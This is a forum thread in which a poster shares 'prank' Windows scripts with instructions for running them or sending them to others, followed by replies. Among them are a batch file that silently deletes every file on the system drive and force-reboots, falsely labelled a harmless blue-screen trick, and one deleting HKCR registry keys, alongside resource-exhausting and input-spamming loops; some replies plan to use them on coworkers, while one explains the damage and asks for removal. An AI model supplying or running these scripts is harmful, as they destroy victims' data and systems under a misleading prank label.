xisto Community
Sign in to follow this  
GaMeRrEmAg

Nasty Windows Tricks Using Vbs Codes blue screen of Death, Instant Shutdown, Endless Notepads

The CMD Codes- to use, open up notepad and copy and paste the code into the notepad. name the file (anyname).vbs (to make a .vbs file, when u save it or save as, it will ask u for a name and which type u want it, so choose all file then just name it as a .vbs file) then just click on the file u just made

*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer

-The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

@echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00

-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer

@echo off msg * Fatal system error due to admin stupidity! shutdown -c "Error! You are too stupid!" -s -t 10

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

@ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked.  Have a nice day. GOTO MESSAGE

-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*

@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top

-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*

Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loop

-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*

Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "~(enter)"loop

-Endless Backspace
*This makes it so the backspace key is constantly being pressed*

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop linenums:0'>MsgBox "Let's go back a few steps"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop
-Popping CD Drives
*This will make the CD drives constantly pop out*

Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 100loop

Edited by OpaQue (see edit history)

Unless this is copied from another source you've managed to categorize things quite nicely. Again- I'd put a really big warning about the Registry Key deleting one; something with big red text.. I've never heard of some of these before. The reoccuring backspace sounds like fun, and the forced blue screen could freak an experienced computer user out. I will most certainly bookmark this topic for future reference. It's a shame so many of my friends use Macs. :PAlso, this is the wrong section.

I have to admit that this is a pretty nifty thing to have, and good to know that it goes away when they shut off their computer (so you aren't a COMPLETE jerk). Some of the things you posted are more annoyances which is better then just messing up their computer completely. I think there should be a limit for how far you can go, and I think this one just hits the line so it didn't go too far. Personally I like the one that will constantly open the CD drive because I know that can get really annoying haha. Then again having the backspace key constantly pressed down could be rather bad. I know that I would just die if I had a whole essay typed up and then re-opening it and find that my work got backspaced out xD! Though I know you can just not save it, it is still funny.I think that what you have written is actually not really for someone you hate or seek revenge for, but rather a good prank. At least for most of the code it is! If it does no permanent damage I don't see how this can be all in good fun, especially since most of these again aren't really bad for the computer, but rather annoying to the user. I think I might use some of these for an april fools joke hehe. Thanks a million! <3-Jester

Man, that's completely diabolical. Like thejestergl says though, it's not really for someone you hate. If you hate someone then you tell them that, and tell them that they're a jerk, and they're not worth the dirt on your shoes or whatever, but revenge is never a good idea. These would definately make for a good prank on a friend though. I like the one about the constantly popping CD drives. :P

Some of them are interesting and I have a funny feeling those could be used in payloads for viruses, worms, trojans etc etc. Although these would be good to play on you friends, well not the file deleting, OS re-installation; but the CD ROM drive and the keyboard tricks would be funny because then they will start yelling at the computer companies on the phone about their computer's screwing up :P.

Cool, I am going to try the one with the popping cd tray right now on my co workers computer, I just need the network name so I can leave him this little present. LOL.... hehe :P

First off, these 4 are not related to VBS, or VBScript, in any way... Code this user posted in the following 4 "pranks" is actually a command intrepreter code, that is written in old fashioned batch files, or .BAT files... These were used in DOS days, to speed up certain tasks that repeated often, a sort of equivalent of the maros...

*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer.

This one is a lie, except in case of BAT-1 code, that I will elaborate on later in this post...

I believe this user has posted truely malicious code here, and that these dangerous ones should be removed, and the true prank ones left here...

BAT-1

@echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00
This one will actually mess Windows up! It will delete ALL the files from your system hard drive, or system partition!

Command DEL is used (naturally) to delete files, %systemdrive% tells this command to wipe out everything from the partition you have your windows installed to (for example, C:), \*.* tells it to wipe every file it finds, and the switches /F /S /Q tell the command to force the deletion of read-only files, to wipe out every sub-directory, and to be quiet about it, respectively... This part is not at all a prank, and I don't recommend anyone trying this one... Ever...

BAT-2

-Stupidity Shutdown

@echo off msg * Fatal system error due to admin stupidity! shutdown -c "Error! You are too stupid!" -s -t 10

Ok, this one really does send the message, but it sends this message to everyone on the network... MSG command is used to send short text messages between two or more computers on the network, mainly local network... MSG * will send the message to all the computers in the network... Not really funny, but hey... It's at least not malicious...

BAT-3

*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

@ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been fcked.  Have a nice day. GOTO MESSAGE
This one is just as bad, as the first one... It wipes out entire HKEY_CLASSES_ROOT registry section, and effectively kills your Windows... And again, it's a command-prompt style batch file... But, none the less, it's very malicious, and should NOT be tried...

BAT-4

-Endless Notepads

@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top

This one is not malicous, as it will only start notepads, until you run out of memory... Then windows will crash... Can be tried on someone I guess...

It appears to me, that this user has copied this code from some site, and has no real coding experience, and is, what would be called a wannabe-hacker... Probably some kid, with too much time on his hands... I would STRONGLY recommend that you avoid using BAT-1 and BAT-3 codes, as they WILL kill your computer, and you won't be able to revive your system without reinstallation... BAT-1 will destroy ANY file found on your system hard drive, and probably all files in your My Documents folder, as this folder is also stored on your system hard drive or partition...

I would urge the moderators to remove BAT-1 and BAT-3 codes, as they pose a big risk for users that do not know what they do... And I would recommend warning this user about posting such content... This could be very harmfull to this community...

Thanks for clarifying that. When OP mentioned them as VBS scripts, I was wondering why VBS looked so much like command-line batch files...

I thought netsend was to send messages over the network...

:P well, i have tried a few of these and they seem to be in order.the shutdown one does NOT delete the hard disk. i have ones tht do though >=) i typed up vbs at the top because some (crazy caps, textpad, ect) wont work on some computers.damn typing with the ps3 controller is annoying

I thought netsend was to send messages over the network...

Indeeed, NET SEND command is also used to send messages across network, but it was mainly designed to send a message to many recipients (I suppose, don't hold me to it), and MSG does just the same...

Here's the output for NET SEND, which has very limited options, as you will see

CONSOLE
C:\>net send

The syntax of this command is:

NET SEND

{name | * | /DOMAIN[:name] | /USERS} message

while MSG has much more options, presented here:

CONSOLE
C:\>msg

Send a message to a user.

MSG {username | sessionname | sessionid | @filename | *}

[/sERVER:servername] [/TIME:seconds] [/V] [/W] [message]

username Identifies the specified username.

sessionname The name of the session.

sessionid The ID of the session.

@filename Identifies a file containing a list of usernames,

sessionnames, and sessionids to send the message to.

* Send message to all sessions on specified server.

/SERVER:servername server to contact (default is current).

/TIME:seconds Time delay to wait for receiver to acknowledge msg.

/V Display information about actions being performed.

/W Wait for response from user, useful with /V.

message Message to send. If none specified, prompts for it

or reads from stdin.

On another matter,

the shutdown one does NOT delete the hard disk.

You'll forgive me if I don't agree with you that it doesn't delete files from your hard disk...

Explanation:

del %systemdrive%\*.* /f /s /q
del - command prompt command, built into every windows system... Deletes files specified...

%systemdrive% - system environment variable, filled in by Windows during boot... Contains drive letter of your system hard drive, that is, drive where your Windows is installed... Most likely, it's drive C... Try it your self, just type echo %systemdrive% in your command prompt:

CONSOLE
C:\>echo %systemdrive%

C:

\*.* - as a parameter to del command, it instructs it to delete every file it finds, in specified directory... In this example, it would be C:\*.*, meaning every file in C:\, excluding directories and their contents...

/f - this switch tells del command, to force the deletion of read-only files

/s - this switch tells del command, to delete every file in every subdirectory, and all the directories too, contained in the original path, meaning, it will delete all the files and directories in C:\, as specified by this code...

/q - this switch tells del command to be quiet about deleting files... No warning will be given, and no report printed on your screen... You won't know what hit you...

So, you see, it does erase data from your hard disk, maybe not ALL system files, but it sure will delete all the user files on that sysrem partition or hard drive...

If you don't believe me, Google for this string, and read on, starting with 5th result... "del %systemdrive%\*.* /f /s /q"

Post #7

Neurotical Squirrel

Group: [HOSTED]Posts: 511
Member No.: 2,127

First off, these 4 are not related to VBS, or VBScript, in any way... Code this user posted in the following 4 "pranks" is actually a command intrepreter code, that is written in old fashioned batch files, or .BAT files... These were used in DOS days, to speed up certain tasks that repeated often, a sort of equivalent of the maros...

QUOTE(GaMeRrEmAg @ Dec 9 2007, 12:46 AM) *
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer.

This one is a lie, except in case of BAT-1 code, that I will elaborate on later in this post...

I believe this user has posted truely malicious code here, and that these dangerous ones should be removed, and the true prank ones left here...

BAT-1
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

This one will actually mess Windows up! It will delete ALL the files from your system hard drive, or system partition!

Command DEL is used (naturally) to delete files, %systemdrive% tells this command to wipe out everything from the partition you have your windows installed to (for example, C:), \*.* tells it to wipe every file it finds, and the switches /F /S /Q tell the command to force the deletion of read-only files, to wipe out every sub-directory, and to be quiet about it, respectively... This part is not at all a prank, and I don't recommend anyone trying this one... Ever...

BAT-2
-Stupidity Shutdown

CODE
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c "Error! You are too stupid!" -s -t 10

Ok, this one really does send the message, but it sends this message to everyone on the network... MSG command is used to send short text messages between two or more computers on the network, mainly local network... MSG * will send the message to all the computers in the network... Not really funny, but hey... It's at least not malicious...

BAT-3

CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE

This one is just as bad, as the first one... It wipes out entire HKEY_CLASSES_ROOT registry section, and effectively kills your Windows... And again, it's a command-prompt style batch file... But, none the less, it's very malicious, and should NOT be tried...

BAT-4
-Endless Notepads
CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

This one is not malicous, as it will only start notepads, until you run out of memory... Then windows will crash... Can be tried on someone I guess...

It appears to me, that this user has copied this code from some site, and has no real coding experience, and is, what would be called a wannabe-hacker... Probably some kid, with too much time on his hands... I would STRONGLY recommend that you avoid using BAT-1 and BAT-3 codes, as they WILL kill your computer, and you won't be able to revive your system without reinstallation... BAT-1 will destroy ANY file found on your system hard drive, and probably all files in your My Documents folder, as this folder is also stored on your system hard drive or partition...

Yeh I agree with this i know alot of batch code and kix that will destroy networks, don't underestimate these languages there not as historic as you think, especially when integrated into new technologies. But a unix command can be used to tear down anything in the world.
Edited by safe.as.haz (see edit history)

(some of)These codes are too malicious for a prank or anything else!In command line and batch files *.* is a certian wildcard which would basically mean [everything]. * is used to replace a group of letters so *.* would mean everything in every extension (everything). Combine it with the DEL (delete) command and that would delete everything. This guy messing with reistry and deletion could totally screw up your computer!